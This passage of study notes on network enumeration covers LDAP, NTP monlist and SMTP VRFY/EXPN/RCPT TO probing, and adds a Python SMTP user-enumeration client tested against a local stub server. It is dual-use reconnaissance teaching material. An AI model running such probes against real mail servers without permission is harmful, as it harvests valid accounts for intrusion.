318 | - Connects on TCP 389 (636 for LDAP over TLS) to a Directory System Agent (DSA)
319 | - Returns information such as valid user names, domain information, addresses, telephone numbers, system data, organization structure and other items
320 | - **Tools**
321 | - Softerra
322 | - JXplorer
323 | - Lex
324 | - LDAP Admin Tool
325 | - **NTP**
326 | - Runs on UDP 123
327 | - Querying can give you a list of systems that have talked to the server (name and IP), e.g. via the monlist command
328 | - **Tools**
329 | - NTP Server Scanner
330 | - AtomSync
331 | - Can also use Nmap and Wireshark
332 | - **Commands** include ntptrace, ntpdc and ntpq
333 | - **SMTP**
334 | - VRFY - asks the server to confirm that a user exists (250 yes, 550 no)
335 | - EXPN - expands a mailing list or alias to its actual delivery addresses
336 | - RCPT TO - names a recipient; a 550 for an unknown user leaks the same information when VRFY and EXPN are disabled
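
An added example (not from the study guide) of the SMTP exchange above and of the banner grabbing described earlier in this chapter: a stub MTA answers VRFY, EXPN and RCPT TO, and the client reads the 220 banner and then probes a list of names. Both ends run locally over a socketpair; the hostnames, users and the "staff" list are constructed for the demo.

```python
import socket
import threading

# Constructed directory for the stub MTA; nothing here is a real host or user
STUB_USERS = {"root": "root@mail.example.test", "alice": "alice@mail.example.test"}
STUB_LISTS = {"staff": ["alice@mail.example.test", "bob@mail.example.test"]}


def stub_mta(conn):
    """Server side: answers VRFY, EXPN and RCPT TO the way an MTA with those commands enabled would."""
    conn.sendall(b"220 mail.example.test ESMTP (constructed banner)\r\n")
    reader = conn.makefile("rb")
    for line in reader:
        verb, _, arg = line.decode(errors="replace").strip().partition(" ")
        verb = verb.upper()
        if verb == "VRFY":
            reply = f"250 {STUB_USERS[arg]}" if arg in STUB_USERS else "550 5.1.1 User unknown"
        elif verb == "EXPN":
            reply = f"250 {', '.join(STUB_LISTS[arg])}" if arg in STUB_LISTS else "550 5.1.1 No such list"
        elif verb == "RCPT":                                       # RCPT TO:<user@host>
            user = arg.split(":", 1)[-1].strip("<> ").split("@")[0]
            reply = "250 2.1.5 Ok" if user in STUB_USERS else "550 5.1.1 User unknown"
        elif verb == "QUIT":
            conn.sendall(b"221 2.0.0 Bye\r\n")
            break
        else:                                                      # HELO, MAIL FROM, ...
            reply = "250 2.0.0 Ok"
        conn.sendall(reply.encode() + b"\r\n")
    conn.close()


def smtp_enumerate(sock, users, lists=()):
    """Client side: grab the banner, then probe each name with VRFY and RCPT TO and each list with EXPN.
    For a real target pass socket.create_connection((host, 25))."""
    reader = sock.makefile("rb")

    def ask(cmd):
        sock.sendall(cmd.encode() + b"\r\n")
        return reader.readline().decode().strip()

    result = {"banner": reader.readline().decode().strip(), "vrfy": {}, "rcpt": {}, "expn": {}}
    ask("HELO scanner.example.test")
    ask("MAIL FROM:<probe@example.test>")              # RCPT TO is only valid after MAIL FROM
    for user in users:
        result["vrfy"][user] = ask(f"VRFY {user}").startswith("250")
        result["rcpt"][user] = ask(f"RCPT TO:<{user}@mail.example.test>").startswith("250")
    for name in lists:
        reply = ask(f"EXPN {name}")
        result["expn"][name] = reply[4:].split(", ") if reply.startswith("250") else None
    ask("QUIT")
    sock.close()
    return result


def demo():
    """Run client and stub server over a socketpair so the exchange works offline."""
    client_end, server_end = socket.socketpair()
    threading.Thread(target=stub_mta, args=(server_end,), daemon=True).start()
    return smtp_enumerate(client_end, ["root", "alice", "mallory"], ["staff"])


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:>6}: {value}")
```

Many MTAs disable VRFY and EXPN, which is why the RCPT TO probe is included: the 250/550 difference after MAIL FROM leaks the same valid-user information unless the server is configured to accept every recipient and bounce later.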
--------------------------------------------------------------------------------